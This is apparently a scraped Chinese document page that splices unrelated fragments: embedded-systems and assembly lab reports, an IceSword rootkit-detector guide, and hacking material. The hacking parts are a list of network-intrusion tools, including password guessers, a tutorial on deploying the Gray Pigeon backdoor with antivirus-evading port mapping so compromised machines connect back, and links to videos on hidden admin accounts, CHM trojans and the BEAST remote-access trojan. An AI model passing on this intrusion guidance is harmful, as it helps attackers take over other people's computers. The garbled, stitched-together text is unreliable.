for(;time<0;time--) for(k=200;k>0;k--) for(j=500;j<0;j--); } void init() { P0=buf[x1]; delay(10); P2=buf[x2]; delay(10); } void main() { init(); while(1) { x1=count/10; x2=count%10; P0=buf[x1]; delay(10);
常用黑客工具(网络入侵工具) 常用黑客工具(网络入侵工具) 一、扫描工具 X-scan 3.1 焦点出的扫描器,国内最优秀的安全扫描软件之一!非常专业的一个扫描器! X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入侵必备工具! SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具,有GUI以及命令行两种扫描方式! SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! U-Scan.exe 非常好的UNICODE漏洞扫描工具! RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! SHED 1.01 一个用来扫描共享漏洞的机器的工具! DSScan V1.00 ms04-011 远程缓冲区溢出漏洞扫描专用! Dotpot PortReady1.6 该软件为“绿色软件”,无需安装,非常小巧(仅23KB),具有极快的扫描速度! WebDAVScan v1.0 针对WEBDA V漏洞的扫描工具! 注意:该软件解压缩时会被查杀! Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! SQLScan v1.2 猜解开着1433端口的住机密码工具! RPC漏洞扫描器v1.03 针对RPC漏洞扫描的工具! 流光5.0 破解版国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 自动攻击探测机Windows NT/2000 自动攻击探测机 4899空口令探测能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 二、远程控制
计算机组成原理与汇编实验报告 计算机组成原理与汇编 实验报告 Company Document number:WUUT-WUUY-WBBGB-BWYTT-1982GT
计算机组成原理与汇编课程设计 实验报告 目录 一、课程设计目标 (3) 二、课程设计基本要求 (3) 三、课程设计的内容 (3) 四、课程设计的要求 (5) 五、实验详细设计 (5) 1.统计文件中各字母出现的频率 (5) 2.用递归计算50以内Fibonacci 数, 以十进制数输出 (9) 3.虚拟平台模拟机实验 (11) 六、使用说明 (19) 七、总结与心得体会 (19) 八、参考文献 (20) 九、附录 (20) 1.字符统计.asm (20) 2.斐波那契数(小于50).asm (29) 一、课程设计目标 通过课程设计使学生综合运用所学过的计算机原理与汇编知识,增强解决实际问题的能力,加深对所学知识的理解与掌握,提高软硬件开发水平,为今后打下基础。 课程设计的目的和要求: 1、使学生巩固和加强《计算机原理与汇编语言》课程的基本理论知识。
2、使学生掌握汇编语言程序设计的方法及编程技巧,正确编写程序。 3、使学生养成良好的编程习惯并掌握调试程序的基本方法。 4、使学生养成规范书写报告文档的能力,撰写课程设计总结报告。 5、通过查阅手册和文献资料,培养学生独立分析问题和解决问题的能力。 二、课程设计的基本要求 1、认真查阅资料,独立完成设计任务,每道题都必须上机通过。 2、编写预习报告,写好代码,上机调试。 3、独立思考,培养综合分析问题解决问题和调试程序的能力。 4、按时完成课程设计,写出课程设计报告。 三、课程设计的内容 1、给定一个英文ASCII码文件,统计文件中英文字母的频率,以十进制形式输出。 2、用递归计算50以内Fibonacci 数, 以十进制数输出. 3、虚拟平台的模型机实验,具体要求如下: 1)选择实验设备,将所需要的组件从组件列表中拖到实验设计流程栏中 2)搭建实验流程:根据原理图1和电路图(见附件),将已选择的组件进行连线。 3)输入机器指令:选择菜单中的“工具”,再选择“模型机调试”,在指令输入窗 口中输入如下指令: 00000000 00010000 00001001 00100000 00001011 00110000 00001011 01000000 00000000 00000001 本实验设计机器指令程序如下:
灰鸽子内网上线教程 序: 灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的老大哥。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。 灰鸽子是一款反弹连接式的木马。现在上网一般是通过ADSL宽带拨号上网、modem上网、无线上网等等多种上网方式,有些是直接处于公网上的,但是也有很多都是用路由划分一个或多个vlan,通过NAT共用一个公网IP地址上网。所以这些用的IP都是内网IP。如果肉鸡中了灰鸽子的服务端,需要反弹回来连接灰鸽子客户端的8000端口。但是,拨号上网的IP不是固定不变而是动态IP,每次获得的IP都是不一样的;或者客户端的IP是一个内网IP。这个时候服务端就不知道该怎么去找到客户端并且连接客户端的8000端口了。(8000端口是灰鸽子的默认端口,这个端口是可以更改的) 要让鸽子的服务端每次都能找到客户端,反过来说就要让客户端的IP可以让服务端每次都可以找得到。不管客户端位于公网还是内网,让服务端找得到的方法其实是一样的。内网上线或者外网上线的方法有很多种:可以绑定一个DDNS 域名(动态域名),可以在路由器上做端口映射,也可以用鸽子自带的vport 工具做端口映射…… 总之方法很多,设置也很简单。如果有路由器的控制权呢可以进入路由器做鸽子的端口映射。如果没有路由器的控制权呢,只能找一个有着公网IP地址的肉鸡来做端口映射了。 因为我的上网环境是处在一个局域网,通过交换机和路由器公用一个公网IP上网,又不能获得路由器的控制权,所以我要讲的是vidc这个工具。因为用这个vidc最大的优点就是永远不会被杀毒软件查杀,这个vidc根本就不在杀毒软件的打击范围,这个不是我一个人说的,是很多黑客老前辈说的,并且我也亲身做过实验,用360杀毒、瑞星和国外杀软avast都进行过扫描,全部都是正常。 正文: 第一步: 把vidc的服务端vidcs传到公网的机子上,肉鸡或者朋友的电脑都可以。然后运行vidc服务端的命令是 vidcs.exe -端口号。比如vidcs.exe -5555.如图:
研究生数字图像处理实验内容及要求(新) 《数字图像处理》实验内容及要求 实验内容 一、灰度图像的快速傅立叶变换 1、 实验任务 对一幅灰度图像实现快速傅立叶变换(DFT ),得到并显示出其频谱图,观察图像傅立叶变换的一些重要性质。 2、 实验条件 微机一台、vc++6.0集成开发环境。 3、实验原理 傅立叶变换是一种常见的图像正交变换,通过变换可以减少图像数据的相关性,获取图像的整体特点,有利于用较少的数据量表示原始图像。 二维离散傅立叶变换的定义如下: 11 2( )00 (,)(,)ux vy M N j M N x y F u v f x y e π---+=== ∑∑ 傅立叶反变换为: 112( )00 1 (,)(,)ux vy M N j M N u v f x y F u v e MN π--+=== ∑∑ 式中变量u 、v 称为傅立叶变换的空间频率。图像大小为M ×N 。随着计算机技术和数字电路的迅速发展,离散傅立叶变换已经成为数字信号处理和
图像处理的一种重要手段。但是,离散傅立叶变换需要的计算量太大,运算时间长。库里和图基提出的快速傅立叶变换大大减少了计算量和存储空间,因此本实验利用快速傅立叶变换来得到一幅灰度图像的频谱图。 快速傅立叶变换的基本思路是把序列分解成若干短序列,并与系数矩阵元素巧妙结合起来计算离散傅立叶变换。若按照奇偶序列将X(n)进行划分,设: ()(2) ()(21)g n x n h n x n =??=+? (n=0,1,2,…,12N -) 则一维傅立叶变换可以改写成下面的形式: 1 0()()N mn N n X m x n W -==∑ 11220 ()()N N mn mn N N n n g n W h n W --===+∑∑ 1122(2)(21) (2)(21)N N m n m n N N n n x n W x n W --+===++∑∑
冰刃使用教程 冰刃使用教程(顽固文件杀灭工具-冰刃Icesword) p.s. 具体可参见下面的参考资料,带图,附中文版下载 这是一斩断黑手的利刃,它适用于Windows 2000/XP/2003 操作系统,其 内部功能是十分强大,用于查探系统中的幕后黑手-木马后门,并作出处理。可 能您也用过很多类似功能的软件,比如一些进程工具、端口工具,但是现在的 系统级后门功能越来越强,一般都可轻而易举地隐藏进程、端口、注册表、文 件信息,一般的工具根本无法发现这些“幕后黑手”。IceSword 使用了大量新颖 的内核技术,使得这些后门躲无所躲。使用前请详细阅读说明。第一次使用请 保存好数据,需要您自己承担可能的风险,特别是多处理器机器的朋友,谢谢. 增加使用教程,帮助更多需要帮助的人 lceSword冰刃(以下简称IceSword)是一款斩断系统黑手的绿色软件。在笔者的 使用中,IceSword表现很令笔者满意,绝对是一把强悍的瑞士军刀——小巧、 强大。 1.IceSword的“防” 打开软件,看出什么没?有经验的用户就会发现,这把冰刃可谓独特,它显示在系统任务栏或软件标题栏的都只是一串随机字串“CE318C”,而并是通常所见的软件程序名(见图1)。这就是IceSword独有的随机字串标题栏,用户每次打开这把冰刃,所出现的字串都是随机生成,随机出现,都不相同(随机五位/六位字串),这样很多通过标题栏来关闭程序的木马和 后门在它面前都无功而返了。另外,你可以试着将软件的文件名改一下,比如 改为 killvir.exe,那么显示出来的进程名就变为了killvir.exe。现在你再试着关 闭一下IceSword,是不是会弹出确认窗口?这样那些木马或后门就算通过鼠标 或键盘钩子控制窗口退出按钮,也不能结束IceSword的运行了,只能在IceSword的面前乖乖就范了。 点击在新窗口中浏览图片 图1 2.IceSword的“攻” 推荐以后用火狐上网,火狐可以保障你上网的安全,可以 放心浏览,可以屏蔽病毒和木马 火狐浏览器在线更新可防止最近最流行的木马及病毒变种.
单片机串行通信实验报告(实验要求、原理、仿真图及例程) 《嵌入式系统原理与实验》实验指导 实验三调度器设计基础 一、实验目的和要求 1.熟练使用Keil C51 IDE集成开发环境,熟练使用Proteus软件。 2.掌握Keil与Proteus的联调技巧。 3.掌握串行通信在单片机系统中的使用。 4.掌握调度器设计的基础知识:函数指针。 二、实验设备 1.PC机一套 2.Keil C51开发系统一套 3.Proteus 仿真系统一套 三、实验内容 1.甲机通过串口控制乙机LED闪烁 (1)要求 a.甲单片机的K1按键可通过串口分别控制乙单片机的LED1闪烁,LED2闪烁,LED1和LED2同时 闪烁,关闭所有的LED。 b.两片8051的串口都工作在模式1,甲机对乙机完成以下4项控制。 i.甲机发送“A”,控制乙机LED1闪烁。 ii.甲机发送“B”,控制乙机LED2闪烁。 iii.甲机发送“C”,控制乙机LED1,LED2闪烁。 iv.甲机发送“C”,控制乙机LED1,LED2停止闪烁。 c.甲机负责发送和停止控制命令,乙机负责接收控制命令并完成控制LED的动作。两机的程序要 分别编写。 d.两个单片机都工作在串口模式1下,程序要先进行初始化,具体步骤如下: i.设置串口模式(SCON) ii.设置定时器1的工作模式(TMOD) iii.计算定时器1的初值 iv.启动定时器 v.如果串口工作在中断方式,还必须设置IE和ES,并编写中断服务程序。
(2)电路原理图 Figure 1 甲机通过串口控制乙机LED闪烁的原理图 (3)程序设计提示 a.模式1下波特率由定时器控制,波特率计算公式参考: b.可以不用使用中断方式,使用查询方式实现发送与接收,通过查询TI和RI标志位完成。 2.单片机与PC串口通讯及函数指针的使用 (1)要求: a.编写用单片机求取整数平方的函数。 b.单片机把计算结果向PC机发送字符串。 c.PC机接收计算结果并显示出来。 d.可以调用Keil C51 中的printf来实现字符串的发送。 e.单片机的数码港显示发送的次数,每9次清零。
实验报告(原理图库的建立) 物理与电子科学学院PCB 实验 —原理图库的设计 教 案 姓名:刘斌 班级:物电 1105 班 学号: 2011112030560 指导老师:曹老师
实验三原理图库的设计教案 (物理与电子科学学院1105班刘斌2011112030560) 一、实验目的: 1.熟悉原理图工作环境,图形工具中各种命令的使用。 2.熟悉原理图符号的编辑,原理图库的建立。 二、实验内容 在protel DXP中完成,完成下列原理图符号的制作。 1.AT89c51单片机原理图符号制作 2.74LS00芯片的原理图制作
二、AT89c51单片机原理图符号制作实验步骤 第一步:新建工程;“打开软件—文件—新建—PCBproject”,步骤如图 第二步:保存工程;快捷保存方式:可以直接点击菜单栏中的保存按钮即可进行保存操作,或者”File—Save Project”,接着选择保存路径即可,步骤如图: 第三步:新建原理图文件;“在Project命令栏中,PCB Project右击,选择Add New to Project ——Schematic”,步骤如图 第四步:新建原件库文件;“Project—Add New to Project—Schematic Library”,步骤如图
第五步:绘制元器件;可以直接在工具栏选择想要的图形,步骤如图: 第六步:绘制元器件引脚;步骤如图: 第七步:绘制元器件;结构如图: 第八步:在原理图中查看绘制好的元器件图形;形状如图: 第九步:对绘制好的元件原理图,进行适当的调整和修改,使其形状尽量的合理美观。
三、74LS00芯片的原理图制作实验步骤 第一、二、三、四步重复:二、A T89c51单片机原理图符号制作实验步骤 第五步:在这里74LS00芯片原理图通过“分部分”来完成绘制;步骤如图: 第五步:添加五个Part,分别为(PartA、B、C、D、E),然后在Part BCDE绘制如下图形;步骤如图: 第六步:在Part A中绘制如下图形;步骤如图:
灰鸽子远程控制木马教程 一定要用迅雷下,不然可能下不了 【黑客视频教程-建立超级隐藏帐户】 https://www.360docs.net/doc/029228260.html,/eschool/esafe2/hideadmin1.wmv https://www.360docs.net/doc/029228260.html,/eschool/esafe2/hideadmin2.wmv https://www.360docs.net/doc/029228260.html,/eschool/esafe2/hideadmin3.wmv 【黑客视频教程-简单制作CHM木马】 https://www.360docs.net/doc/029228260.html,/eschool/esafe2/CHM1.wmv https://www.360docs.net/doc/029228260.html,/eschool/esafe2/CHM2.wmv 【黑客视频教程-简单破解Access数据库的密码】 https://www.360docs.net/doc/029228260.html,/eschool/esafe2/Access.wmv 【黑客视频教程-功能超强的BEAST远控木马】 https://www.360docs.net/doc/029228260.html,/eschool/esafe2/BEAST1.wmv https://www.360docs.net/doc/029228260.html,/eschool/esafe2/BEAST2.wmv https://www.360docs.net/doc/029228260.html,/eschool/esafe2/BEAST3.wmv https://www.360docs.net/doc/029228260.html,/eschool/esafe2/BEAST4.wmv 【黑客视频教程-VMware虚拟机的安装和使用】 https://www.360docs.net/doc/029228260.html,/eschool/esafe2/VMware1.wmv https://www.360docs.net/doc/029228260.html,/eschool/esafe2/VMware2.wmv https://www.360docs.net/doc/029228260.html,/eschool/esafe2/VMware3.wmv 【黑客视频教程-Iris网络嗅探器使用与技巧】 https://www.360docs.net/doc/029228260.html,/eschool/esafe2/Iris01.wmv